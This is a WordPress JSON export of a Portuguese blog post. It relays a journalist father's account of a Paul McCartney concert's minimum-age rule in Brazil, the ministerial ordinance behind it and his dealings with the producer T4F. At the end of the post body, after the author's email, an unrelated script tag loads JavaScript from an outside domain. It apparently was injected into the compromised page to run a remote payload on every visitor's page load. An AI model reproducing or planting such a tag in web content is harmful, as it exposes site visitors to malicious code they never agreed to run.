{"id":13256,"date":"2017-10-22T20:19:15","date_gmt":"2017-10-22T23:19:15","guid":{"rendered":"http:\/\/mapati.com.br\/?p=13256"},"modified":"2017-10-24T20:16:34","modified_gmt":"2017-10-24T23:16:34","slug":"hey-jude-ii","status":"publish","type":"post","link":"https:\/\/mapati.com.br\/blogmapati\/hey-jude-ii\/","title":{"rendered":"Hey Jude (II)"},"content":{"rendered":"<p>Com o Planalto Central ainda castigado pela baix\u00edssima umidade do ar neste domingo dois patinhos no lago Parano\u00e1 quase impotente (cad\u00ea a chuva?), volto ao\u00a0<em>note<\/em>\u00a0e especulo: a esta altura, o Paul McCartney, j\u00e1 muito longe de S\u00e3o Paulo, deve ter deixado o M\u00e9xico e realmente&#8230; Realmente, devo confessar, n\u00e3o sei por onde ele anda. Cad\u00ea o ex-beatle, um dos maiores artistas do mundo?<\/p>\n<p>Por ora, n\u00e3o importa para n\u00f3s. Quem se encontra em nosso palco iluminado \u00e9 a discuss\u00e3o sobre o poder do estado (e dos produtores de evento) \u00a0no estabelecer a idade m\u00ednima para crian\u00e7as (acompanhadas dos pais ou respons\u00e1veis, se menores de dezesseis anos) assistirem a shows noturnos de m\u00fasica em est\u00e1dios de futebol.<\/p>\n<p>Na postagem anterior, inaugural, publicamos registro feito por um pai, revoltado porque a filha de nove anos fora barrada por for\u00e7a de determina\u00e7\u00e3o judicial nesse sentido, suscitada pelos organizadores, mesmo diante do fato de que a crian\u00e7a entraria com ele e a m\u00e3e dela.<\/p>\n<p>Nesta, desvelando o ovo da serpente, vamos reproduzir o depoimento de outro pai, jornalista, portanto senhor das palavras pela profiss\u00e3o e, no meu ju\u00edzo, senhor da raz\u00e3o, haja vista que carregado de fundamentos os mais procedentes e irrefut\u00e1veis, expostos no que o autor denomina com mod\u00e9stia de \u201crelato\u201d &#8211; e n\u00e3o de \u201creclama\u00e7\u00e3o\u201d, o que seria mais adequado &#8211; sobre o vertente t\u00f3pico, a tens\u00e3o\u00a0entre p\u00e1trio poder e classifica\u00e7\u00e3o et\u00e1ria. O in\u00edcio se d\u00e1 com uma express\u00e3o em latim, mas o texto \u00e9 escorreito e pois de f\u00e1cil leitura e assimila\u00e7\u00e3o.<\/p>\n<p><a href=\"http:\/\/mapati.com.br\/site\/wp-content\/uploads\/2017\/10\/Paul2.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"wp-image-13258 aligncenter\" src=\"http:\/\/mapati.com.br\/site\/wp-content\/uploads\/2017\/10\/Paul2.jpg\" alt=\"\" width=\"460\" height=\"575\" srcset=\"https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul2.jpg 589w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul2-240x300.jpg 240w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul2-200x250.jpg 200w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul2-400x500.jpg 400w\" sizes=\"(max-width: 460px) 100vw, 460px\" \/><\/a><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cConfusa lex, sed lex<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cEu n\u00e3o vou reclamar, juro pra voc\u00ea. Eu sabia desde o in\u00edcio que a \u2018classifica\u00e7\u00e3o et\u00e1ria indicativa\u2019 para os shows do Paul McCartney no Brasil era a n\u00e3o muito emp\u00e1tica \u2018n\u00e3o ser\u00e1 permitida a entrada de menores de 10 anos\u2019 e meu filho mais novo, e mais f\u00e3, tem apenas oito e meio.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cE a lei \u00e9 lei, mesmo quando \u00e9 confusa, arbitr\u00e1ria e incoerente.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cEnt\u00e3o o que segue n\u00e3o \u00e9 bem uma reclama\u00e7\u00e3o. \u00c9 s\u00f3 um relato do que eu descobri nos quase cinco meses em que passei tentando descobrir os limites. Na verdade, tentando descobrir o que diabos significa e a quem serve a \u2018classifica\u00e7\u00e3o et\u00e1ria indicativa\u2019 \u2013 e como eu poderia usar da minha prerrogativa de pai para levar meu filho para ver um reles show em S\u00e3o Paulo que eu julgo muito importante para a forma\u00e7\u00e3o dele.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cO relato abaixo talvez sirva para meus colegas jornalistas que eventualmente estejam produzindo alguma pauta nesses tempos em que se discute a seguran\u00e7a da crian\u00e7a e os direitos do pai:\u00a0<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cBem, os ingressos para todos os shows da turn\u00ea brasileira de Paul McCartney foram colocados \u00e0 venda a zero hora do dia 08 de maio. Para minha surpresa, diferentemente das outras milhares de passagens de Paul pelo pa\u00eds \u2013 quando eu mesmo vi diversas crian\u00e7as pequenas em seus shows, sem que nenhum incidente tenha sido registrado \u2013 desta vez foi anunciado que menores de dez anos n\u00e3o seriam permitidos. Entre 10 e 16 anos, s\u00f3 com respons\u00e1veis. Antes que os ingressos fossem postos \u00e0 venda, passei dias conversando com advogados, educadores, jornalistas especializados em roteiro cultural, e cheguei mesmo a ir ao Conselho Tutelar: ningu\u00e9m parecia totalmente convicto a respeito do sentido da lei, nem se ela se sobrep\u00f5e ao meu direito de expor meus filhos ao que eu considero adequado \u00e0 sua educa\u00e7\u00e3o cultural.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cUm amigo jornalista me soprou o texto que me parecia a mais razo\u00e1vel:\u00a0<strong>cabe aos pais ou respons\u00e1veis autorizar o acesso de suas crian\u00e7as e\/ou adolescentes a divers\u00e3o ou espet\u00e1culo cuja classifica\u00e7\u00e3o indicativa seja superior a faixa et\u00e1ria destes, por\u00e9m inferior a 18 anos, desde que acompanhadas por eles<\/strong>.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201c(Na verdade, o texto em it\u00e1lico \u00e9 o que diz a Portaria n\u00ba 1100, de 14\/07\/2016 do Minist\u00e9rio da Justi\u00e7a, a mesma afixada em todos os cinemas &#8211; negritei. Marcos).<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cComprei os ingressos online porque me bastava para isso o CPF do titular do cart\u00e3o. Soube depois que amigos que tentaram comprar presencialmente para seus filhos tiveram sua compra negada. Com os ingressos pagos, come\u00e7ou minha jornada em busca da certeza de n\u00e3o ser barrado na catraca.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cEu queria alguma luz, o que encontrei foi justamente escurid\u00e3o.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cComecei do jeito simples, ligando para a T4F, produtora do show. O atendente disse que n\u00e3o poderia permitir o ingresso do meu filho, porque \u2018o alvar\u00e1\u2019 o impedia. Pedi ent\u00e3o para ter acesso ao documento, para que pudesse ser analisado por meu advogado, mas o rapaz me respondeu que eles s\u00f3 teriam acesso a ele \u2018alguns dias antes do show\u2019. Ent\u00e3o lhe fiz a pergunta \u00f3bvia: se o alvar\u00e1 \u00e9 que determina a classifica\u00e7\u00e3o et\u00e1ria, como j\u00e1 existe uma classifica\u00e7\u00e3o indicativa? E veio a resposta \u00f3bvia: \u2018N\u00e3o sei, mas posso encaminhar sua d\u00favida internamente\u2019. Imaginei que sozinho conseguisse respostas mais r\u00e1pidas. Agradeci e desliguei.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cEscrevo esse texto faltando cinco dias para o show. Entrei no site oficial da T4F e no bannerzinho \u2018alvar\u00e1\u2019 embaixo da foto do Paul McCartney, h\u00e1 um link que me leva para um pdf com diversos eventos passados:<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cTroquei mensagens com alguns promotores de shows (um deles, ali\u00e1s, ligado ao pr\u00f3prio show em quest\u00e3o). Foi quando recebi a sugest\u00e3o de entrar com o pedido de liminar junto \u00e0 Vara da Inf\u00e2ncia.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: right;\"><em>\u201cPassei semanas reunindo documentos, mostrando que eu estaria presente, que a m\u00e3e tamb\u00e9m autorizara, que haveria dois adultos zelando pelo menino, que eu havia cuidado de comprar ingressos nas cadeiras inferiores para evitar as aglomera\u00e7\u00f5es da pista, que eu sou jornalista acostumado a grandes eventos, que ele pr\u00f3prio j\u00e1 havia ido a diversos shows musicais e que aquela poderia ser a \u00faltima chance de meus filhos assistirem ao cara que eles jogam no Rock Band The Beatles. Que, em que pese o sentido da classifica\u00e7\u00e3o et\u00e1ria (n\u00e3o que eu enxergasse o sentido, mas, vamos l\u00e1), o que eu estava pleiteando era sensibilidade para um caso que me parecia excepcional.<\/em><\/p>\n<p style=\"padding-left: 90px; text-align: center;\"><em>\u201cA\u00ed come\u00e7ou a parte mais ins\u00f3lita&#8230;\u201d<\/em><\/p>\n<p style=\"text-align: center;\">#Confusa lex, sed lex\u00a0 \u00a0 #Poder do estado\u00a0 \u00a0 #Show em est\u00e1dio de futebol\u00a0 \u00a0 #Classifica\u00e7\u00e3o et\u00e1ria indicativa\u00a0 \u00a0 #Portaria n\u00ba 1100, de 14\/07\/2016 do Minist\u00e9rio da Justi\u00e7a\u00a0 \u00a0 #Alvar\u00e1 judicial\u00a0 \u00a0#T4F (produtora)<\/p>\n<p style=\"text-align: right;\">22\/10\/2017<\/p>\n<p style=\"font-style: inherit; font-weight: inherit; text-align: right;\">(264)<\/p>\n<p style=\"font-style: inherit; font-weight: inherit; text-align: right;\"><a href=\"mailto:mmsmarcos1953@hotmail.com\">mmsmarcos1953@hotmail.com<\/a><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Com o Planalto Central ainda castigado pela baix\u00edssima umidade do ar neste domingo dois patinhos no lago Parano\u00e1 quase impotente (cad\u00ea a chuva?), volto ao\u00a0note\u00a0e especulo: a esta altura, o Paul McCartney, j\u00e1 muito longe de S\u00e3o Paulo, deve ter deixado o M\u00e9xico e realmente&#8230; Realmente, devo confessar, n\u00e3o sei por onde ele anda. Cad\u00ea o ex-beatle, um dos maiores artistas do mundo? Por ora, n\u00e3o importa para n\u00f3s. Quem se encontra em nosso palco iluminado \u00e9 a discuss\u00e3o sobre o poder do estado (e dos produtores de evento) \u00a0no estabelecer a idade m\u00ednima para crian\u00e7as (acompanhadas dos pais ou respons\u00e1veis, se menores de dezesseis anos) assistirem a shows noturnos de m\u00fasica em est\u00e1dios de futebol. Na postagem anterior, inaugural, publicamos registro feito por um pai, revoltado porque a filha de nove anos fora barrada por for\u00e7a de determina\u00e7\u00e3o judicial nesse sentido, suscitada pelos organizadores, mesmo diante do fato de que a crian\u00e7a entraria com ele e a m\u00e3e dela. Nesta, desvelando o ovo da serpente, vamos reproduzir o depoimento de outro pai, jornalista, portanto senhor das palavras pela profiss\u00e3o e, no meu ju\u00edzo, senhor da raz\u00e3o, haja vista que carregado de fundamentos os mais procedentes e irrefut\u00e1veis, expostos no que o autor denomina com mod\u00e9stia de \u201crelato\u201d &#8211; e n\u00e3o de \u201creclama\u00e7\u00e3o\u201d, o que seria mais adequado &#8211; sobre o vertente t\u00f3pico, a tens\u00e3o\u00a0entre p\u00e1trio poder e classifica\u00e7\u00e3o et\u00e1ria. O in\u00edcio se d\u00e1 com uma express\u00e3o em latim, mas o texto \u00e9 escorreito e pois de f\u00e1cil leitura e assimila\u00e7\u00e3o. \u201cConfusa lex, sed lex \u201cEu n\u00e3o vou reclamar, juro pra voc\u00ea. Eu sabia desde o in\u00edcio que a \u2018classifica\u00e7\u00e3o et\u00e1ria indicativa\u2019 para os shows do Paul McCartney no Brasil era a n\u00e3o muito emp\u00e1tica \u2018n\u00e3o ser\u00e1 permitida a entrada de menores de 10 anos\u2019 e meu filho mais novo, e mais f\u00e3, tem apenas oito e meio. \u201cE a lei \u00e9 lei, mesmo quando \u00e9 confusa, arbitr\u00e1ria e incoerente. \u201cEnt\u00e3o o que segue n\u00e3o \u00e9 bem uma reclama\u00e7\u00e3o. \u00c9 s\u00f3 um relato do que eu descobri nos quase cinco meses em que passei tentando descobrir os limites. Na verdade, tentando descobrir o que diabos significa e a quem serve a \u2018classifica\u00e7\u00e3o et\u00e1ria indicativa\u2019 \u2013 e como eu poderia usar da minha prerrogativa de pai para levar meu filho para ver um reles show em S\u00e3o Paulo que eu julgo muito importante para a forma\u00e7\u00e3o dele. \u201cO relato abaixo talvez sirva para meus colegas jornalistas que eventualmente estejam produzindo alguma pauta nesses tempos em que se discute a seguran\u00e7a da crian\u00e7a e os direitos do pai:\u00a0 \u201cBem, os ingressos para todos os shows da turn\u00ea brasileira de Paul McCartney foram colocados \u00e0 venda a zero hora do dia 08 de maio. Para minha surpresa, diferentemente das outras milhares de passagens de Paul pelo pa\u00eds \u2013 quando eu mesmo vi diversas crian\u00e7as pequenas em seus shows, sem que nenhum incidente tenha sido registrado \u2013 desta vez foi anunciado que menores de dez anos n\u00e3o seriam permitidos. Entre 10 e 16 anos, s\u00f3 com respons\u00e1veis. Antes que os ingressos fossem postos \u00e0 venda, passei dias conversando com advogados, educadores, jornalistas especializados em roteiro cultural, e cheguei mesmo a ir ao Conselho Tutelar: ningu\u00e9m parecia totalmente convicto a respeito do sentido da lei, nem se ela se sobrep\u00f5e ao meu direito de expor meus filhos ao que eu considero adequado \u00e0 sua educa\u00e7\u00e3o cultural. \u201cUm amigo jornalista me soprou o texto que me parecia a mais razo\u00e1vel:\u00a0cabe aos pais ou respons\u00e1veis autorizar o acesso de suas crian\u00e7as e\/ou adolescentes a divers\u00e3o ou espet\u00e1culo cuja classifica\u00e7\u00e3o indicativa seja superior a faixa et\u00e1ria destes, por\u00e9m inferior a 18 anos, desde que acompanhadas por eles. \u201c(Na verdade, o texto em it\u00e1lico \u00e9 o que diz a Portaria n\u00ba 1100, de 14\/07\/2016 do Minist\u00e9rio da Justi\u00e7a, a mesma afixada em todos os cinemas &#8211; negritei. Marcos). \u201cComprei os ingressos online porque me bastava para isso o CPF do titular do cart\u00e3o. Soube depois que amigos que tentaram comprar presencialmente para seus filhos tiveram sua compra negada. Com os ingressos pagos, come\u00e7ou minha jornada em busca da certeza de n\u00e3o ser barrado na catraca. \u201cEu queria alguma luz, o que encontrei foi justamente escurid\u00e3o. \u201cComecei do jeito simples, ligando para a T4F, produtora do show. O atendente disse que n\u00e3o poderia permitir o ingresso do meu filho, porque \u2018o alvar\u00e1\u2019 o impedia. Pedi ent\u00e3o para ter acesso ao documento, para que pudesse ser analisado por meu advogado, mas o rapaz me respondeu que eles s\u00f3 teriam acesso a ele \u2018alguns dias antes do show\u2019. Ent\u00e3o lhe fiz a pergunta \u00f3bvia: se o alvar\u00e1 \u00e9 que determina a classifica\u00e7\u00e3o et\u00e1ria, como j\u00e1 existe uma classifica\u00e7\u00e3o indicativa? E veio a resposta \u00f3bvia: \u2018N\u00e3o sei, mas posso encaminhar sua d\u00favida internamente\u2019. Imaginei que sozinho conseguisse respostas mais r\u00e1pidas. Agradeci e desliguei. \u201cEscrevo esse texto faltando cinco dias para o show. Entrei no site oficial da T4F e no bannerzinho \u2018alvar\u00e1\u2019 embaixo da foto do Paul McCartney, h\u00e1 um link que me leva para um pdf com diversos eventos passados: \u201cTroquei mensagens com alguns promotores de shows (um deles, ali\u00e1s, ligado ao pr\u00f3prio show em quest\u00e3o). Foi quando recebi a sugest\u00e3o de entrar com o pedido de liminar junto \u00e0 Vara da Inf\u00e2ncia. \u201cPassei semanas reunindo documentos, mostrando que eu estaria presente, que a m\u00e3e tamb\u00e9m autorizara, que haveria dois adultos zelando pelo menino, que eu havia cuidado de comprar ingressos nas cadeiras inferiores para evitar as aglomera\u00e7\u00f5es da pista, que eu sou jornalista acostumado a grandes eventos, que ele pr\u00f3prio j\u00e1 havia ido a diversos shows musicais e que aquela poderia ser a \u00faltima chance de meus filhos assistirem ao cara que eles jogam no Rock Band The Beatles. Que, em que pese o sentido da classifica\u00e7\u00e3o et\u00e1ria (n\u00e3o que eu enxergasse o sentido, mas, vamos l\u00e1), o que eu estava pleiteando era sensibilidade para um caso que me parecia excepcional. \u201cA\u00ed come\u00e7ou a parte mais ins\u00f3lita&#8230;\u201d #Confusa lex, sed lex\u00a0 \u00a0 #Poder do estado\u00a0 \u00a0 #Show em est\u00e1dio de futebol\u00a0 \u00a0 #Classifica\u00e7\u00e3o et\u00e1ria indicativa\u00a0 \u00a0 #Portaria n\u00ba 1100, de 14\/07\/2016 do Minist\u00e9rio da Justi\u00e7a\u00a0 \u00a0 #Alvar\u00e1 judicial\u00a0 \u00a0#T4F (produtora) 22\/10\/2017 (264) mmsmarcos1953@hotmail.com<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-13256","post","type-post","status-publish","format-standard","hentry","category-sem-categoria"],"_links":{"self":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13256","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/comments?post=13256"}],"version-history":[{"count":7,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13256\/revisions"}],"predecessor-version":[{"id":13271,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13256\/revisions\/13271"}],"wp:attachment":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/media?parent=13256"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/categories?post=13256"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/tags?post=13256"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}